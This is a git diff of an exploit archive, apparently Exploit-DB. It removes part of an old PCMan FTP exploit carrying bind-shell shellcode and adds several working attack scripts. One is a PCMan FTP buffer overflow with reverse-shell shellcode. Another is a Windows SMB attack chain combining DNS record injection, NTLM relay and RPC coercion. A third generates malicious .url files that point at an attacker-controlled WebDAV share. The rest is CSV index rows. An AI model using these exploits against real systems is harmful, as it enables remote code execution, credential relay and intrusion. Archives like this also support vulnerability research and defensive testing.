"\x65\x82\xA5\x7C" - NOP = "\x90" * 50 - - #348 Bytes Bind Shell Port TCP/4444 - #msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R | - #msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1" R - shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9" - shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46" - shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84" - shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8" - shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08" - shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27" - shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24" - shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80" - shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98" - shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7" - shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0" - shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82" - shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0" - shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6" - shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d" - shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32" - shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90" - shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5" - shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71" - shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2" - shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f" - shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14" - shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec" - shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88" - shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79" - - sploit = Cmd + JuNk + ret + NOP + shellcode - sploit += "\x42" * (2992 - len(NOP + shellcode)) + "\r\n" - - try: - print "\n [*] Creating network socket." - net_sock = socket(AF_INET, SOCK_STREAM) - except: - print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info() - sleep(1) - exit(0) - - try: - print " [*] Connecting to PCMan FTP Server @ %s on port TCP/%d." % (victim, port) - net_sock.connect((victim, port)) - except: - print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info()) - sleep(1) - exit(0) - - try: - print """ [*] Attempting to exploit the FTP USER command. - [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. - [*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) - net_sock.send(sploit) - sleep(1) - except: - print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) - sleep(1) - exit(0) - - try: - print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! - [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" - net_sock.close() - except: - print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() - sleep(1) - exit(0) - - -if __name__ == "__main__": - main() \ No newline at end of file diff --git a/exploits/windows/remote/52326.txt b/exploits/windows/remote/52326.txt new file mode 100644 index 000000000..f11f9932b --- /dev/null +++ b/exploits/windows/remote/52326.txt @@ -0,0 +1,72 @@ +# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow +# Date: 04/17/2025 +# Exploit Author: Fernando Mengali +# Vendor Homepage: http://pcman.openfoundry.org/ +# Software Link: +https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z +# Version: 2.0.7 +# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 : +Service Pack 2) +# CVE: CVE-2025-4255 + +# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444 +EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl +#offset: 2007 +#badchars: \x00\x0a\x0d +#EIP: 0x74e32fd9 (JMP ESP) + +my $buf = +"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" . +"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" . +"\x4c\x84\x82\x32\x8d\xe9\x0b\xd7\xbc\x29\x6f\x9c\xef\x99" . +"\xfb\xf0\x03\x51\xa9\xe0\x90\x17\x66\x07\x10\x9d\x50\x26" . +"\xa1\x8e\xa1\x29\x21\xcd\xf5\x89\x18\x1e\x08\xc8\x5d\x43" . +"\xe1\x98\x36\x0f\x54\x0c\x32\x45\x65\xa7\x08\x4b\xed\x54" . +"\xd8\x6a\xdc\xcb\x52\x35\xfe\xea\xb7\x4d\xb7\xf4\xd4\x68" . +"\x01\x8f\x2f\x06\x90\x59\x7e\xe7\x3f\xa4\x4e\x1a\x41\xe1" . +"\x69\xc5\x34\x1b\x8a\x78\x4f\xd8\xf0\xa6\xda\xfa\x53\x2c" . +"\x7c\x26\x65\xe1\x1b\xad\x69\x4e\x6f\xe9\x6d\x51\xbc\x82" . +"\x8a\xda\x43\x44\x1b\x98\x67\x40\x47\x7a\x09\xd1\x2d\x2d" . +"\x36\x01\x8e\x92\x92\x4a\x23\xc6\xae\x11\x2c\x2b\x83\xa9" . +"\xac\x23\x94\xda\x9e\xec\x0e\x74\x93\x65\x89\x83\xd4\x5f" . +"\x6d\x1b\x2b\x60\x8e\x32\xe8\x34\xde\x2c\xd9\x34\xb5\xac" . +"\xe6\xe0\x1a\xfc\x48\x5b\xdb\xac\x28\x0b\xb3\xa6\xa6\x74" . +"\xa3\xc9\x6c\x1d\x4e\x30\xe7\xe2\x27\x8a\x7f\x8a\x35\xea" . +"\x6e\x17\xb3\x0c\xfa\xb7\x95\x87\x93\x2e\xbc\x53\x05\xae" . +"\x6a\x1e\x05\x24\x99\xdf\xc8\xcd\xd4\xf3\xbd\x3d\xa3\xa9" . +"\x68\x41\x19\xc5\xf7\xd0\xc6\x15\x71\xc9\x50\x42\xd6\x3f" . +"\xa9\x06\xca\x66\x03\x34\x17\xfe\x6c\xfc\xcc\xc3\x73\xfd" . +"\x81\x78\x50\xed\x5f\x80\xdc\x59\x30\xd7\x8a\x37\xf6\x81" . +"\x7c\xe1\xa0\x7e\xd7\x65\x34\x4d\xe8\xf3\x39\x98\x9e\x1b" . +"\x8b\x75\xe7\x24\x24\x12\xef\x5d\x58\x82\x10\xb4\xd8\xa2" . +"\xf2\x1c\x15\x4b\xab\xf5\x94\x16\x4c\x20\xda\x2e\xcf\xc0" . +"\xa3\xd4\xcf\xa1\xa6\x91\x57\x5a\xdb\x8a\x3d\x5c\x48\xaa" . +"\x17"; + + +# Version 5.1 (Build 2600.xpsp.080413-3111 : Service Pack 2) + +my $sock = IO::Socket::INET->new( + PeerAddr => "192.168.176.131", + PeerPort => "21", + Proto => 'tcp', +) or die "Cannot connect to 192.168.176.131:21: $!\n"; + +my $offset = "A"x2007; +my $eip = "\xd9\x2f\xe3\x74"; +my $nops = "\x90"x20; +my $payload = $offset . $eip . $nops . $buf; +my $r = <$sock>; +print $sock "USER anonymous\r\n"; +$r = <$sock>; +print $r; +sleep(1); +print $sock "PASS anonymous\r\n"; +$r = <$sock>; +print $r; +sleep(1); +print $sock "RMD $payload\r\n"; +$r = <$sock>; +print $r; +sleep(1); +close($sock); \ No newline at end of file diff --git a/exploits/windows/remote/52330.py b/exploits/windows/remote/52330.py new file mode 100755 index 000000000..8c9fc9e09 --- /dev/null +++ b/exploits/windows/remote/52330.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python3 +# Exploit Title: Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE) +# Author: Mohammed Idrees Banyamer +# Instagram: @banyamer_security +# GitHub: https://github.com/mbanyamer +# Date: 2025-06-13 +# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2 +# CVE: CVE-2025-33073 +# Type: Remote +# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025) +# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay +# User Interaction: Required (authenticated domain user) +# Remediation Level: Official Fix Available +# +# Affected Versions: +# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x) +# - Windows Server 2022 (including 23H2 editions) +# - Windows Server 2019 +# - Windows 10 versions from 1507 up to 22H2 +# - Windows Server 2016 and 2008 (with appropriate versions) +# +# Description: +# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients, +# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx, +# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server +# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x), +# Windows Server 2022, and earlier versions vulnerable to this method. +# +# +# Note: The exploit requires the victim to be an authenticated domain user and the environment +# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA). +# +# DISCLAIMER: For authorized security testing and educational use only. + +import argparse +import subprocess +import socket +import time +import sys + +def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip): + print("[*] Injecting DNS record via samba-tool (requires admin privileges)...") + cmd = [ + "samba-tool", "dns", "add", dns_ip, dc_fqdn, + record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword" + ] + try: + subprocess.run(cmd, check=True) + print("[+] DNS record successfully added.") + except subprocess.CalledProcessError: + print("[!] Failed to add DNS record. Check credentials and connectivity.") + sys.exit(1) + +def check_record(record_name): + print("[*] Verifying DNS record propagation...") + for i in range(10): + try: + result = socket.gethostbyname_ex(record_name) + if result and result[2]: + print(f"[+] DNS record resolved to: {result[2]}") + return True + except socket.gaierror: + time.sleep(2) + print("[!] DNS record did not propagate or resolve.") + return False + +def start_ntlmrelay(target): + print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...") + try: + subprocess.Popen([ + "impacket-ntlmrelayx", "-t", target, "--no-smb-server" + ]) + print("[*] NTLM relay server started.") + except Exception as e: + print(f"[!] Failed to start NTLM relay server: {e}") + sys.exit(1) + +def trigger_coercion(victim_ip, fake_host): + print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...") + cmd = [ + "rpcping", + "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]", + "-s", fake_host, + "-e", "1234", + "-a", "n", + "-u", "none", + "-p", "none" + ] + try: + subprocess.run(cmd, check=True) + print("[+] Coercion RPC call sent successfully.") + except subprocess.CalledProcessError: + print("[!] RPC coercion failed. Verify victim connectivity and service status.") + sys.exit(1) + +def main(): + parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion") + parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server") + parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)") + parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller") + parser.add_argument("--target", required=True, help="Target system to relay authentication to") + parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from") + args = parser.parse_args() + + record = "relaytrigger" + fqdn = f"{record}.{args.dc_fqdn}" + + inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip) + if not check_record(fqdn): + print("[!] DNS verification failed, aborting.") + sys.exit(1) + + start_ntlmrelay(args.target) + time.sleep(5) # Wait for relay server to be ready + + trigger_coercion(args.victim_ip, fqdn) + + print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/52334.NA b/exploits/windows/remote/52334.NA new file mode 100644 index 000000000..594d1d22d --- /dev/null +++ b/exploits/windows/remote/52334.NA @@ -0,0 +1,62 @@ +Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE) +Date: June 2025 +Author: Dev Bui Hieu +Tested on: Windows 10, Windows 11 +Platform: Windows +Type: Remote +CVE: CVE-2025-33053 + +Description: +This exploit leverages the behavior of Windows .URL files to execute a +remote binary over a UNC path. When a victim opens or previews the .URL +file (e.g. from email), the system may automatically reach out to the +specified path (e.g. WebDAV or SMB share), leading to arbitrary code +execution without prompt. + +```bash +python3 gen_url.py --ip 192.168.1.100 --out doc.url +``` + +import argparse + +def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified): + content = f"""[InternetShortcut] +URL={url_target} +WorkingDirectory={working_directory} +ShowCommand=7 +IconIndex={icon_index} +IconFile={icon_file} +Modified={modified} +""" + with open(output_file, "w", encoding="utf-8") as f: + f.write(content) + print(f"[+] .url file created: {output_file}") + +def main(): + parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)") + + parser.add_argument('--out', default="bait.url", help="Output .url file name") + parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path") + parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)") + parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe", + help="Target executable path on victim machine") + parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", + help="Icon file path") + parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)") + parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)") + + args = parser.parse_args() + + working_directory = fr"\\{args.ip}\{args.share}\\" + + generate_url_file( + output_file=args.out, + url_target=args.exe, + working_directory=working_directory, + icon_file=args.icon, + icon_index=args.index, + modified=args.modified + ) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 24225c382..0d466b2e0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5208,6 +5208,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49977,exploits/ios/local/49977.py,"memono Notepad Version 4.2 - Denial of Service (PoC)",2021-06-10,"Geovanni Ruiz",local,ios,,2021-06-10,2021-10-28,0,,,,,, 38634,exploits/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",remote,ios,,2013-07-09,2015-11-05,1,,,,,,https://www.securityfocus.com/bid/61081/info 34399,exploits/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",remote,ios,,2014-08-24,2014-08-24,0,OSVDB-110474;OSVDB-110446;OSVDB-110445,,,,, +52333,exploits/ios/remote/52333.py,"AirKeyboard iOS App 1.0.5 - Remote Input Injection",2025-06-15,"Chokri Hammedi",remote,ios,,2025-06-15,2025-06-15,0,CVE-n/a,,,,, 42996,exploits/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",remote,ios,,2017-10-17,2017-10-17,1,CVE-2017-7115,,OneRing,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1317#c3 42784,exploits/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",remote,ios,,2017-09-25,2017-09-27,1,CVE-2017-11120,"Out Of Bounds",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios,,2014-03-10,2015-12-28,1,CVE-2013-6835;OSVDB-104272,,,,,https://www.securityfocus.com/bid/66108/info @@ -10549,6 +10550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple,,2004-01-28,2012-12-23,1,CVE-2004-2134;OSVDB-20189,,,,,https://www.securityfocus.com/bid/9515/info 21283,exploits/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,local,multiple,,2002-02-07,2012-09-12,1,CVE-2002-1731;OSVDB-27079,,,,,https://www.securityfocus.com/bid/4059/info 43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2017-18016,,,,,https://github.com/tintinweb/pub/tree/352d69d518b9b9c0f4983f1254418f0e9755cbb2/pocs/cve-2017-18016 +52329,exploits/multiple/local/52329.py,"Parrot and DJI variants Drone OSes - Kernel Panic Exploit",2025-06-15,"Mohammed Idrees Banyamer",local,multiple,,2025-06-15,2025-06-15,0,CVE-2025-37928,,,,, 16307,exploits/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,local,multiple,,2010-09-20,2016-10-27,1,CVE-2009-2261;OSVDB-54966,"Metasploit Framework (MSF)",,,http://www.exploit-db.compeazip-2.6.1.WINDOWS.exe.zip, 22272,exploits/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",local,multiple,,2002-02-22,2012-10-27,1,,,,,,https://www.securityfocus.com/bid/6909/info 7503,exploits/multiple/local/7503.txt,"PHP 'python' Extension - 'safe_mode' Local Bypass",2008-12-17,"Amir Salmani",local,multiple,,2008-12-16,,1,OSVDB-53573,,,,, @@ -12386,6 +12388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,, 52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,, 33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info +52335,exploits/multiple/webapps/52335.py,"Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI",2025-06-15,"Cristian Branet",webapps,multiple,,2025-06-15,2025-06-15,0,CVE-2025-49619,,,,, 49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,,2021-01-12,2021-01-12,0,,,,,, 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,, 49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,, @@ -14238,7 +14241,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,, 5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip, 48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,, -52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-06-13,0,CVE-2024-37732,,,,, +52327,exploits/php/webapps/52327.txt,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-06-15,/bin/neko,webapps,php,,2025-06-15,2025-06-15,0,CVE-2025-46041,,,,, 37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info 26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip, 27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info @@ -22953,6 +22956,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",webapps,php,,2011-07-13,2012-10-28,1,,,,,, 26535,exploits/php/webapps/26535.txt,"Litespeed 2.1.5 - 'ConfMgr.php' Cross-Site Scripting",2005-11-17,"Gama Sec",webapps,php,,2005-11-17,2013-07-02,1,CVE-2005-3695;OSVDB-20908,,,,,https://www.securityfocus.com/bid/15485/info 52099,exploits/php/webapps/52099.py,"Litespeed Cache 6.5.0.1 - Authentication Bypass",2025-03-28,"Caner Tercan",webapps,php,,2025-03-28,2025-04-13,0,CVE-2024-44000,,,,, +52328,exploits/php/webapps/52328.py,"Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation",2025-06-15,"Milad karimi",webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-28000,,,,, 11503,exploits/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - Cross-Site Request Forgery (Add Admin) / Cross-Site Scripting",2010-02-19,d1dn0t,webapps,php,,2010-02-18,2010-08-31,1,OSVDB-62449,,,,http://www.exploit-db.comlsws-4.0.12-std-i386-linux.tar.gz, 49523,exploits/php/webapps/49523.txt,"LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)",2021-02-05,SunCSR,webapps,php,,2021-02-05,2021-02-05,0,,,,,, 25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",webapps,php,,2005-06-03,2013-05-28,1,,,,,,https://www.securityfocus.com/bid/13850/info @@ -26362,6 +26366,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17309,exploits/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",webapps,php,,2011-05-20,2011-05-20,0,,,SOS-11-007.zip,,,http://www.senseofsecurity.com.au/advisories/SOS-11-007.pdf 13747,exploits/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,webapps,php,,2010-06-05,,1,,,,,, 11323,exploits/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",webapps,php,,2010-02-02,,1,OSVDB-62088;CVE-2010-0631,,,,, +52331,exploits/php/webapps/52331.py,"PHP CGI Module 8.3.4 - Remote Code Execution (RCE)",2025-06-15,İbrahimsql,webapps,php,,2025-06-15,2025-06-15,0,CVE-2024-4577,,,,, 14425,exploits/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",webapps,php,,2010-07-20,2010-07-27,1,,,,,http://www.exploit-db.comphp_chat_for_123flashchat.zip, 34078,exploits/php/webapps/34078.txt,"PHP City Portal 1.3 - 'cms_data.php' Cross-Site Scripting",2010-06-02,Red-D3v1L,webapps,php,,2010-06-02,2014-07-16,1,,,,,,https://www.securityfocus.com/bid/40532/info 18210,exploits/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,webapps,php,,2011-12-07,2011-12-07,1,OSVDB-78091,,,,, @@ -41052,6 +41057,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows,,2011-11-07,2011-11-07,1,CVE-2011-0105;OSVDB-71765;MS11-021,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-11-121/ 18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,, 40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,, +52332,exploits/windows/local/52332.txt,"Microsoft Excel Use After Free - Local Code Execution",2025-06-15,nu11secur1ty,local,windows,,2025-06-15,2025-06-15,0,CVE-2025-27751,,,,, 50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,, 51212,exploits/windows/local/51212.txt,"Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path",2023-04-03,"Milad karimi",local,windows,,2023-04-03,2023-04-03,0,,,,,, 50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,, @@ -45191,9 +45197,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38013,exploits/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow",2015-08-29,Koby,remote,windows,21,2015-08-31,2016-10-31,1,CVE-2013-4730;OSVDB-94624,,,http://www.exploit-db.com/screenshots/idlt38500/38013.png,http://www.exploit-db.comPCMan.7z, 40713,exploits/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Remote Buffer Overflow",2016-11-04,"Luis Noriega",remote,windows,,2016-11-04,2016-11-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-04-at-122818.png,http://www.exploit-db.comPCMan.7z, 40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z, +52326,exploits/windows/remote/52326.txt,"PCMan FTP Server 2.0.7 - Buffer Overflow",2025-06-15,"Fernando Mengali",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-4255,,,,, 38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z, 27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z, -26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, 31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, 31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna 